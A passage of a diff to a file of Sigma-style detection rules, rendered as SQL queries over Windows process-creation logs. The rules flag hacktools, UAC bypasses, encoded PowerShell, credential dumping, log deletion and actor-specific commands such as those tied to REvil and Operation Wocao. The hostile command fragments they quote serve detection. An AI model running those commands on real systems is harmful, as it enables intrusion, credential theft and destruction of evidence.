--dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "status": "experimental", - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" - }, - { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_download_dll.yml" - }, - { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", "attack.defense_evasion", - "attack.t1036.004", "attack.t1027", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1547.001" + "attack.t1546" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" - }, - { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName 